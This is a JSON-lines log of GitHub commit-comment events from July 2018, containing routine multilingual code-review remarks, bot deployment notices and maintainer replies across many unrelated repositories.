{"id":"7971122110","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721722,"position":null,"line":null,"path":null,"commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:42:15Z","updated_at":"2018-07-16T14:42:15Z","author_association":"CONTRIBUTOR","body":"@dalikim 좋습니다. 시간은 내일 아침 일찍 잡아보아요."}},"created_at":"2018-07-16T14:42:15Z"}
{"id":"7971124370","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29721730,"position":62,"line":45,"path":"contracts/Remittance.sol","commit_id":"2a86c1bdebdce1906b40de40dee75cd3eee358e4","created_at":"2018-07-16T14:42:37Z","updated_at":"2018-07-16T14:42:37Z","author_association":"OWNER","body":"Not a good idea ?"}},"created_at":"2018-07-16T14:42:37Z"}
{"id":"7971126567","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29721736,"position":null,"line":null,"path":null,"commit_id":"ee9b0d185d4012d2fdb2384dfe1b62d802a515e0","created_at":"2018-07-16T14:42:57Z","updated_at":"2018-07-16T14:42:57Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-76](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-76).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-76-next50.pantheonsite.io/)"}},"created_at":"2018-07-16T14:42:57Z"}
{"id":"7971130159","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721744,"position":8,"line":41,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:43:29Z","updated_at":"2018-07-16T14:43:29Z","author_association":"CONTRIBUTOR","body":"보통 메일이 와서 특정해서 유저를 찾는 케이스만 고려해서 만들었어요. 그렇게 하는 편이 검색하기 편하겠네요!"}},"created_at":"2018-07-16T14:43:29Z"}
{"id":"7971130502","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29721746,"position":null,"line":null,"path":null,"commit_id":"50d69f6cec91b0e5ab563d9d48bcb9fea9295cc5","created_at":"2018-07-16T14:43:33Z","updated_at":"2018-07-16T14:43:33Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#sep-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#sep-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://sep-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-16T14:43:33Z"}
{"id":"7971131878","type":"CommitCommentEvent","actor":{"login":"yveskerwyn"},"repo":{"name":"threefoldfoundation/info_foundation"},"payload":{"comment":{"id":29721750,"position":null,"line":null,"path":null,"commit_id":"2aa36949d5c16e24ba7f46a0b3f125132ea26b06","created_at":"2018-07-16T14:43:45Z","updated_at":"2018-07-16T14:43:45Z","author_association":"CONTRIBUTOR","body":"@despiegk for consistency please put the `-* [Home](/)` back"}},"created_at":"2018-07-16T14:43:45Z"}
{"id":"7971134321","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721755,"position":21,"line":54,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:44:08Z","updated_at":"2018-07-16T14:44:08Z","author_association":"CONTRIBUTOR","body":"아마 rails way를 몰라서 그런 것 같습니다. 페어를 해 보면 좋을 것 같습니다."}},"created_at":"2018-07-16T14:44:08Z"}
{"id":"7971135021","type":"CommitCommentEvent","actor":{"login":"pikeview"},"repo":{"name":"clojure-emacs/refactor-nrepl"},"payload":{"comment":{"id":29721756,"position":null,"line":null,"path":null,"commit_id":"3dd98c9737c6ab57f99f7178348696b0fc26e9ed","created_at":"2018-07-16T14:44:14Z","updated_at":"2018-07-16T14:44:14Z","author_association":"NONE","body":"Hi, how can I get the updated code with the fix. will there be a patch release for this fix?"}},"created_at":"2018-07-16T14:44:14Z"}
{"id":"7971138188","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721763,"position":7,"line":9,"path":"routes/enroll/routes_enroll.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:44:44Z","updated_at":"2018-07-16T14:44:44Z","author_association":"MEMBER","body":"`post:` -> `get:`\r\n현재 메소드가 `get` 인 것만 구현되어 있음.\r\n메소드가 `post` 인 것은 추후 @kms6190 의 구현 완료 후 문서화"}},"created_at":"2018-07-16T14:44:44Z"}
{"id":"7971141434","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721773,"position":21,"line":23,"path":"routes/enroll/routes_enroll.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:45:16Z","updated_at":"2018-07-16T14:45:16Z","author_association":"MEMBER","body":"`get` 메소드 이므로 body 받는 데이터가 없음."}},"created_at":"2018-07-16T14:45:16Z"}
{"id":"7971142484","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721775,"position":19,"line":21,"path":"routes/enroll/routes_enroll.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:45:25Z","updated_at":"2018-07-16T14:45:25Z","author_association":"MEMBER","body":"뒤에 따옴표 빠짐."}},"created_at":"2018-07-16T14:45:25Z"}
{"id":"7971144861","type":"CommitCommentEvent","actor":{"login":"furqanbaqai"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29721782,"position":30,"line":28,"path":"contracts/Remittance.sol","commit_id":"a2dfdb2598dbdf1a19f54c4584ea38bc9300d3f5","created_at":"2018-07-16T14:45:49Z","updated_at":"2018-07-16T14:45:49Z","author_association":"OWNER","body":"Idea behind introducing one more field was to diversify the check and keep the transaction record in-tact, tagged with payment ID. Just a small practice we follow in financial systems. \r\nBut you are right, it is adding the gas and we are already checking the funds variable, which makes this check redundunt. I have changed the code and will push the fix.\r\n"}},"created_at":"2018-07-16T14:45:49Z"}
{"id":"7971148067","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721791,"position":5,"line":38,"path":"app/controllers/admin/users_controller.rb","commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:46:20Z","updated_at":"2018-07-16T14:46:20Z","author_association":"CONTRIBUTOR","body":"이미 stat이란 view가 있어서 별 생각 없이 list 해버린 것 같습니다. 말씀 듣고 보니 회원 목록이라면 index에 해당하는 기능이군요. 수정이 필요해 보입니다."}},"created_at":"2018-07-16T14:46:20Z"}
{"id":"7971150762","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29721799,"position":33,"line":33,"path":"test/account-mgmt.test.js","commit_id":"333971814f38c25a39f7d12da41e46813302185a","created_at":"2018-07-16T14:46:44Z","updated_at":"2018-07-16T14:46:44Z","author_association":"OWNER","body":"good catch - thanks"}},"created_at":"2018-07-16T14:46:44Z"}
{"id":"7971154286","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721809,"position":31,"line":33,"path":"routes/enroll/routes_enroll.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:47:17Z","updated_at":"2018-07-16T14:47:17Z","author_association":"MEMBER","body":"과거의 코드를 기준으로 작성했거나, 과거의 것을 그대로 유지한 것으로 보임.\r\n새 코드를 기준으로 `responses:` 부분 다시 작성할 것."}},"created_at":"2018-07-16T14:47:17Z"}
{"id":"7971155968","type":"CommitCommentEvent","actor":{"login":"yveskerwyn"},"repo":{"name":"threefoldfoundation/info_foundation"},"payload":{"comment":{"id":29721814,"position":null,"line":null,"path":null,"commit_id":"6c72797e80b6ec80b3249ed7f95bec88949c2d43","created_at":"2018-07-16T14:47:32Z","updated_at":"2018-07-16T14:47:32Z","author_association":"CONTRIBUTOR","body":"@despiegk removing the `/blog/` breaks the blogs TOC, can you put them back"}},"created_at":"2018-07-16T14:47:32Z"}
{"id":"7971157921","type":"CommitCommentEvent","actor":{"login":"sukso96100"},"repo":{"name":"s-owl/skhu-backend"},"payload":{"comment":{"id":29721822,"position":13,"line":15,"path":"routes/enroll/routes_enroll.js","commit_id":"bd970dab7b0334f311da39143f9d4d27dbeca62d","created_at":"2018-07-16T14:47:51Z","updated_at":"2018-07-16T14:47:51Z","author_association":"MEMBER","body":"오탈자 수정 요망."}},"created_at":"2018-07-16T14:47:51Z"}
{"id":"7971158511","type":"CommitCommentEvent","actor":{"login":"takitomohiroslove"},"repo":{"name":"taki19/sample"},"payload":{"comment":{"id":29721824,"position":null,"line":null,"path":null,"commit_id":"1e18c41f4daaffa735595a8321f3d00c2f5a074b","created_at":"2018-07-16T14:47:57Z","updated_at":"2018-07-16T14:47:57Z","author_association":"NONE","body":"hurry up"}},"created_at":"2018-07-16T14:47:57Z"}
{"id":"7971162410","type":"CommitCommentEvent","actor":{"login":"takitomohiroslove"},"repo":{"name":"taki19/sample"},"payload":{"comment":{"id":29721832,"position":null,"line":null,"path":null,"commit_id":"1e18c41f4daaffa735595a8321f3d00c2f5a074b","created_at":"2018-07-16T14:48:33Z","updated_at":"2018-07-16T14:48:33Z","author_association":"NONE","body":"im waiting till the morning before it starts"}},"created_at":"2018-07-16T14:48:33Z"}
{"id":"7971166237","type":"CommitCommentEvent","actor":{"login":"zambamingi"},"repo":{"name":"baldurk/renderdoc"},"payload":{"comment":{"id":29721836,"position":22,"line":402,"path":"renderdoc/driver/dxgi/dxgi_wrapped.cpp","commit_id":"98a6bb56ca5ecc976aab3b510ffa3d1daf2816fa","created_at":"2018-07-16T14:49:09Z","updated_at":"2018-07-16T14:49:09Z","author_association":"NONE","body":"Thanks for the response!  I tried modifying the app to use ID3D12Resource instead of IUnknown and was able to get around this problem.  I'll file an issue in the future if I'm unable to get this change to my app made due to unforeseen issues with changing the type."}},"created_at":"2018-07-16T14:49:09Z"}
{"id":"7971167212","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29721839,"position":null,"line":null,"path":null,"commit_id":"7b9b75baa3d9b70b71bf74ec59e644e91ed123ec","created_at":"2018-07-16T14:49:18Z","updated_at":"2018-07-16T14:49:18Z","author_association":"MEMBER","body":"Ok. I've to admit that I've not the slightest idea what you're planning with this branch (since mentioning sunxi but dealing with ODROID too?) and how changes get merged.\r\n\r\nAt least [this commit](https://github.com/armbian/build/commit/0a54d03ed8e086131ac2b5e1d4dda3b5af882f4c) should please not get lost when later merging in changes from here to master?"}},"created_at":"2018-07-16T14:49:18Z"}
{"id":"7971167902","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721842,"position":null,"line":null,"path":null,"commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:49:25Z","updated_at":"2018-07-16T14:49:25Z","author_association":"CONTRIBUTOR","body":"아 레일즈 기본 패턴이 아직 익숙치 않으시군요. 101을 통해 기본패턴을 더 익히신 후 페어를 잡는게 좋겠습니다."}},"created_at":"2018-07-16T14:49:25Z"}
{"id":"7971172234","type":"CommitCommentEvent","actor":{"login":"eponymz"},"repo":{"name":"eponymz/prerelease-toolkit"},"payload":{"comment":{"id":29721852,"position":20,"line":15,"path":"client/src/components/Login.js","commit_id":"4139a6aa98bf4d2dede39b3dcecddbdd1a0289f6","created_at":"2018-07-16T14:50:06Z","updated_at":"2018-07-16T14:50:06Z","author_association":"OWNER","body":"jsx convention requires style={{}}. Code did not compile on heroku. WIll fix in my base and merge up in next deploy."}},"created_at":"2018-07-16T14:50:06Z"}
{"id":"7971179096","type":"CommitCommentEvent","actor":{"login":"mesteves-mw"},"repo":{"name":"JeremySkinner/FluentValidation"},"payload":{"comment":{"id":29721878,"position":6,"line":64,"path":"src/FluentValidation/ValidationException.cs","commit_id":"f34a51e4f744ba2ff40ab12a892f24476bc3733b","created_at":"2018-07-16T14:51:07Z","updated_at":"2018-07-16T14:51:07Z","author_association":"NONE","body":"I glanced at this and am wondering if anyone expecting the current behaviour will not be affected by this? I mean anyone that still expects the display name to be handled automatically will potentially see this a breaking change for them. Unless I am missing something which I probably am."}},"created_at":"2018-07-16T14:51:07Z"}
{"id":"7971183881","type":"CommitCommentEvent","actor":{"login":"Aardenfell"},"repo":{"name":"drizzydom/Zira"},"payload":{"comment":{"id":29721885,"position":null,"line":null,"path":null,"commit_id":"a8c4c63339bae781dd1a12fbfdf45a6e5df38f3b","created_at":"2018-07-16T14:51:51Z","updated_at":"2018-07-16T14:51:51Z","author_association":"NONE","body":"@drizzydom I would recommend you change your token + user and pass if you already haven't "}},"created_at":"2018-07-16T14:51:51Z"}
{"id":"7971187931","type":"CommitCommentEvent","actor":{"login":"JeremySkinner"},"repo":{"name":"JeremySkinner/FluentValidation"},"payload":{"comment":{"id":29721894,"position":6,"line":64,"path":"src/FluentValidation/ValidationException.cs","commit_id":"f34a51e4f744ba2ff40ab12a892f24476bc3733b","created_at":"2018-07-16T14:52:27Z","updated_at":"2018-07-16T14:52:27Z","author_association":"OWNER","body":"@mesteves-mw Could you elaborate? This is just the info exception message, it doesn't have anything to do with display names."}},"created_at":"2018-07-16T14:52:27Z"}
{"id":"7971188181","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29721895,"position":null,"line":null,"path":null,"commit_id":"e57049027cdc4b762af76b196e9e475a587fc5e2","created_at":"2018-07-16T14:52:29Z","updated_at":"2018-07-16T14:52:29Z","author_association":"CONTRIBUTOR","body":"@dalikim 네. 기본 패턴을 더 연구해 보겠습니다."}},"created_at":"2018-07-16T14:52:29Z"}
{"id":"7971193112","type":"CommitCommentEvent","actor":{"login":"joefitzgerald"},"repo":{"name":"cloudfoundry-community/go-uaa"},"payload":{"comment":{"id":29721903,"position":5,"line":60,"path":"api.go","commit_id":"1994bd4b730ec543a7c5fad5c202bd910cbec474","created_at":"2018-07-16T14:53:16Z","updated_at":"2018-07-16T14:53:16Z","author_association":"MEMBER","body":"This doesn't seem necessary, given that you can set `API.SkipSSLValidation` directly on the returned API."}},"created_at":"2018-07-16T14:53:16Z"}
{"id":"7971194646","type":"CommitCommentEvent","actor":{"login":"BunnyPi04"},"repo":{"name":"thanhsangcao/learn_laravel"},"payload":{"comment":{"id":29721907,"position":5,"line":5,"path":"resources/views/auth/login.blade.php","commit_id":"c1eca8540240fff1f23e4b16daddc7e2704fb45e","created_at":"2018-07-16T14:53:29Z","updated_at":"2018-07-16T14:53:29Z","author_association":"NONE","body":"indent = 4 spaces nhé"}},"created_at":"2018-07-16T14:53:29Z"}
{"id":"7971196587","type":"CommitCommentEvent","actor":{"login":"BunnyPi04"},"repo":{"name":"thanhsangcao/learn_laravel"},"payload":{"comment":{"id":29721909,"position":44,"line":44,"path":"resources/views/auth/login.blade.php","commit_id":"c1eca8540240fff1f23e4b16daddc7e2704fb45e","created_at":"2018-07-16T14:53:46Z","updated_at":"2018-07-16T14:53:46Z","author_association":"NONE","body":"thiếu dòng trắng cuối file"}},"created_at":"2018-07-16T14:53:46Z"}
{"id":"7971197730","type":"CommitCommentEvent","actor":{"login":"Julusian"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29721911,"position":5,"line":26,"path":"src/modules/ffmpeg/producer/ffmpeg_producer.h","commit_id":"87791e16fbe1430f50811cfcd85c0abfcabee5d6","created_at":"2018-07-16T14:53:57Z","updated_at":"2018-07-16T14:53:57Z","author_association":"COLLABORATOR","body":"@ronag looks like an accidental typo here"}},"created_at":"2018-07-16T14:53:57Z"}
{"id":"7971199048","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29721914,"position":87,"line":61,"path":"test/Remittance.js","commit_id":"f0ba5fbb23339abefb7975d5beee2f9dabd73ffc","created_at":"2018-07-16T14:54:09Z","updated_at":"2018-07-16T14:54:09Z","author_association":"OWNER","body":"mmm...\r\nDoes the txObj contain the value returned by the function ? I am checking the material in Unit 4 and it looks like is not there."}},"created_at":"2018-07-16T14:54:09Z"}
{"id":"7971203023","type":"CommitCommentEvent","actor":{"login":"cdambo"},"repo":{"name":"Rafi1900/1901"},"payload":{"comment":{"id":29721922,"position":13,"line":12,"path":"README.md","commit_id":"b0799d2074e61a3bf40126ebc03834a744d65823","created_at":"2018-07-16T14:54:44Z","updated_at":"2018-07-16T14:54:44Z","author_association":"COLLABORATOR","body":"כן עכשיו ראיתי שהיה לי באג :)\r\n"}},"created_at":"2018-07-16T14:54:44Z"}
{"id":"7971203201","type":"CommitCommentEvent","actor":{"login":"joefitzgerald"},"repo":{"name":"cloudfoundry-community/go-uaa"},"payload":{"comment":{"id":29721924,"position":17,"line":179,"path":"api.go","commit_id":"2ff506463652619c373da41a34d4a75fd77c6424","created_at":"2018-07-16T14:54:45Z","updated_at":"2018-07-16T14:54:45Z","author_association":"MEMBER","body":"😍 good catch!"}},"created_at":"2018-07-16T14:54:45Z"}
{"id":"7971206589","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29721935,"position":4,"line":166,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T14:55:18Z","updated_at":"2018-07-16T14:55:18Z","author_association":"COLLABORATOR","body":"For nipy you need to look through their previous release API docs to see which one is the first one not to have the functionality you need. Or be lazy and just see what was released 2 years ago, and if it has that, set it as the minimum :)\r\n\r\nFor nibabel we already have a minimum requirement in README.rst that should be sufficient for you"}},"created_at":"2018-07-16T14:55:18Z"}
{"id":"7971207897","type":"CommitCommentEvent","actor":{"login":"AlexeyGorodinsky"},"repo":{"name":"AlexeyGorodinsky/Homework_3_5"},"payload":{"comment":{"id":29721938,"position":null,"line":null,"path":null,"commit_id":"7755ecb9898cb05c5a888ad439420cbf240ea48e","created_at":"2018-07-16T14:55:29Z","updated_at":"2018-07-16T14:55:29Z","author_association":"OWNER","body":"Внесены изменения в соответствии с замечаниями"}},"created_at":"2018-07-16T14:55:29Z"}
{"id":"7971208135","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29721940,"position":null,"line":null,"path":null,"commit_id":"b8d6bb0171bcb609a8d839be9ca8cc24c65726c8","created_at":"2018-07-16T14:55:32Z","updated_at":"2018-07-16T14:55:32Z","author_association":"MEMBER","body":"I thought that we keep linear history. Why do you violate your own rules?"}},"created_at":"2018-07-16T14:55:32Z"}
{"id":"7971214624","type":"CommitCommentEvent","actor":{"login":"mikekirchem"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721959,"position":null,"line":null,"path":null,"commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:56:32Z","updated_at":"2018-07-16T14:56:32Z","author_association":"NONE","body":":+1: for readability. Nice and easy to see your intention\r\n\r\nI'd suggest if doing for a job application, I'd try and use OOP as it demonstrates both a capability and also a state of mind/habit. I do appreciate that this test doesn't really lend itself to it ..."}},"created_at":"2018-07-16T14:56:32Z"}
{"id":"7971215279","type":"CommitCommentEvent","actor":{"login":"QuadmasterXLII"},"repo":{"name":"QuadmasterXLII/ImageInpainting"},"payload":{"comment":{"id":29721960,"position":4,"line":18,"path":"demo.py","commit_id":"42dab0d0249c2f0daa94052b67de9e8d932018cc","created_at":"2018-07-16T14:56:38Z","updated_at":"2018-07-16T14:56:38Z","author_association":"OWNER","body":"The image is read outside the loop in order to correctly size the network\n(resizing the network is very slow) and read again inside the loop to\nupdate the mask.\n\nOn Mon, Jul 16, 2018 at 10:38 AM Zach Mullen <notifications@github.com>\nwrote:\n\n> Why move this outside the loop? If we're still encoding the mask in the\n> image itself, don't we need to re-read it inside the loop?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/QuadmasterXLII/ImageInpainting/commit/42dab0d0249c2f0daa94052b67de9e8d932018cc#commitcomment-29721652>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGgnAZrii5kBtjSpdgtBYkcRDqnhGe93ks5uHKVYgaJpZM4VRP0G>\n> .\n>\n-- \n--Hastings Greer\nUNC Class of 2017\n919 525 6808 -- github.com/QuadmasterXLII\n"}},"created_at":"2018-07-16T14:56:38Z"}
{"id":"7971215517","type":"CommitCommentEvent","actor":{"login":"cris0195"},"repo":{"name":"cris0195/avengers"},"payload":{"comment":{"id":29721962,"position":null,"line":null,"path":null,"commit_id":"7ff7e50cfa4b9863885d508ef108d491ea267f19","created_at":"2018-07-16T14:56:41Z","updated_at":"2018-07-16T14:56:41Z","author_association":"OWNER","body":"aquí creamos a misión de red #8 \r\nlol"}},"created_at":"2018-07-16T14:56:41Z"}
{"id":"7971216626","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29721971,"position":87,"line":61,"path":"test/Remittance.js","commit_id":"f0ba5fbb23339abefb7975d5beee2f9dabd73ffc","created_at":"2018-07-16T14:56:51Z","updated_at":"2018-07-16T14:56:51Z","author_association":"OWNER","body":"oh ok! in this case, I can pick it up from the event log.\r\nI suppose that if it was not there then I can't retrieve the payment id."}},"created_at":"2018-07-16T14:56:51Z"}
{"id":"7971217168","type":"CommitCommentEvent","actor":{"login":"deangray82"},"repo":{"name":"aidandyde/tech-task"},"payload":{"comment":{"id":29721973,"position":150,"line":150,"path":"TechnicalTask/index.php","commit_id":"c932cc0ddeda0aec5608d3fe0a568974585b41c6","created_at":"2018-07-16T14:56:57Z","updated_at":"2018-07-16T14:56:57Z","author_association":"NONE","body":"The `sort` function returns `true` or `false`. It passes the array by reference, so the `$data` variable will be sorted."}},"created_at":"2018-07-16T14:56:57Z"}
{"id":"7971218122","type":"CommitCommentEvent","actor":{"login":"vcarulla"},"repo":{"name":"vcarulla/rails_practique"},"payload":{"comment":{"id":29721975,"position":null,"line":null,"path":null,"commit_id":"f333b0cdf1f01a9f55e636af7082346b234743d9","created_at":"2018-07-16T14:57:06Z","updated_at":"2018-07-16T14:57:06Z","author_association":"OWNER","body":"En función de mostrar quien hizo los comentarios del post. Se debe **agregar belong_to :user** en el model _comments.rb_\r\npero antes debemos referenciarlo en la tabla con rails g migration **AddUserToComments** user:references\r\nSe limpia la tabla con **Comment.all.destroy.all** y se hace el **rake db:migrate**"}},"created_at":"2018-07-16T14:57:06Z"}
{"id":"7971218570","type":"CommitCommentEvent","actor":{"login":"bmanojlovic"},"repo":{"name":"sinokylin/terraform-provider-ovirt"},"payload":{"comment":{"id":29721976,"position":null,"line":null,"path":null,"commit_id":"46ce91b31f1db54dda783cc081853fdaaf782875","created_at":"2018-07-16T14:57:11Z","updated_at":"2018-07-16T14:57:11Z","author_association":"NONE","body":"ah good catch, as i always have VLANs i did not check for case where it does not exist :)"}},"created_at":"2018-07-16T14:57:11Z"}
{"id":"7971223819","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"QuadmasterXLII/ImageInpainting"},"payload":{"comment":{"id":29721987,"position":4,"line":18,"path":"demo.py","commit_id":"42dab0d0249c2f0daa94052b67de9e8d932018cc","created_at":"2018-07-16T14:57:58Z","updated_at":"2018-07-16T14:57:58Z","author_association":"COLLABORATOR","body":"ah, missed that. Thanks!"}},"created_at":"2018-07-16T14:57:58Z"}
{"id":"7971233741","type":"CommitCommentEvent","actor":{"login":"pkboss777"},"repo":{"name":"pkboss777/kampiler"},"payload":{"comment":{"id":29722006,"position":null,"line":null,"path":null,"commit_id":"c000dd1e7a63079ce59cd06c5d1d6df00b811037","created_at":"2018-07-16T14:59:28Z","updated_at":"2018-07-16T14:59:28Z","author_association":"OWNER","body":"https://gumroad.com/kampiler"}},"created_at":"2018-07-16T14:59:28Z"}
{"id":"7971235126","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29722008,"position":null,"line":null,"path":null,"commit_id":"a58adaceea82ae372fc0aded5c4d698c2ae838c3","created_at":"2018-07-16T14:59:40Z","updated_at":"2018-07-16T14:59:40Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T14:59:40Z"}
{"id":"7971239312","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29722019,"position":null,"line":null,"path":null,"commit_id":"7b9b75baa3d9b70b71bf74ec59e644e91ed123ec","created_at":"2018-07-16T15:00:18Z","updated_at":"2018-07-16T15:00:18Z","author_association":"MEMBER","body":"Initial idea was to prepare sunxi-next to 4.18 and merge back in when ready. Next - a nightly building is now attached to this branch and since we also need to test odroidxu4 I did this change inside this branch. I am planning to merge it to master after some testing and feedback. Only regression known to me is no hdmi out with A64 boards. If we don't care about that ... sunxi-4.18 can be merged \"today\"."}},"created_at":"2018-07-16T15:00:18Z"}
{"id":"7971240264","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29722024,"position":29,"line":29,"path":"lib/s390base.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T15:00:25Z","updated_at":"2018-07-16T15:00:25Z","author_association":"NONE","body":"This way we will fetch only .sh file, and only one single file ?\r\nIn some of our testcases, we have many .sh scripts and also other files like config files and they have no extension.\r\n\r\nMy suggestion is to rewrite it this way:\r\n`my $path    = data_url(\"s390x/$tc\");`\r\n`assert_script_run \"mkdir -p ./tmp/ && cd ./tmp/\";`\r\n`assert_script_run \"wget -r -l1 -H -t1 -nd -N -np -R'index.html*' -erobots=off $path\";`\r\n\r\nAfter that, we will pass testcase name as variable for the function `copy_testsuite`, like \r\n`copy_testsuite('TOOL_s390_chchp');`\r\nand it will fetch all the needed files from `data/s390x/TOOL_s390_chchp` folder"}},"created_at":"2018-07-16T15:00:25Z"}
{"id":"7971251460","type":"CommitCommentEvent","actor":{"login":"ilonazakharova"},"repo":{"name":"ilonazakharova/java_course"},"payload":{"comment":{"id":29722042,"position":null,"line":null,"path":null,"commit_id":"46e26e298a8e4d6a6a531cb5de7bae3147eb7677","created_at":"2018-07-16T15:02:04Z","updated_at":"2018-07-16T15:02:04Z","author_association":"OWNER","body":"https://github.com/ilonazakharova/java_course/commit/f193cefc9bb0d0989797f6eb84a52d4269c31361\r\n\r\nВ Runner небольшая опечатка с расчетом среднего балла - не хватает скобочек. В коммите по ссылке в комментарии исправила это\r\n\r\nДолжно быть вот так\r\n  return (student.getProgramming() + student.getMathematics() + student.getEnglish()) / 3;"}},"created_at":"2018-07-16T15:02:04Z"}
{"id":"7971251646","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29722044,"position":null,"line":null,"path":null,"commit_id":"067387794438a1d9f5eddef200e1e7a4978ce650","created_at":"2018-07-16T15:02:06Z","updated_at":"2018-07-16T15:02:06Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T15:02:06Z"}
{"id":"7971259940","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29722060,"position":null,"line":null,"path":null,"commit_id":"f1f4709127705eafe4e6d9d640e9802d8202a235","created_at":"2018-07-16T15:03:22Z","updated_at":"2018-07-16T15:03:22Z","author_association":"MEMBER","body":"Thanks to @mazvi for the suggestion."}},"created_at":"2018-07-16T15:03:22Z"}
{"id":"7971262153","type":"CommitCommentEvent","actor":{"login":"vcarulla"},"repo":{"name":"vcarulla/rails_practique"},"payload":{"comment":{"id":29722063,"position":null,"line":null,"path":null,"commit_id":"e81f45c47a41a30e82c4684c246470ac1afad74d","created_at":"2018-07-16T15:03:46Z","updated_at":"2018-07-16T15:03:46Z","author_association":"OWNER","body":"descomentar y ejecutar **bundle** para agregar la gema _bcrypt_ \r\nla creación del modelo usuario lleva un campo del tipo password_digest:string\r\ny en el modelo creado se utiliza el helper _has_secure_password_ "}},"created_at":"2018-07-16T15:03:46Z"}
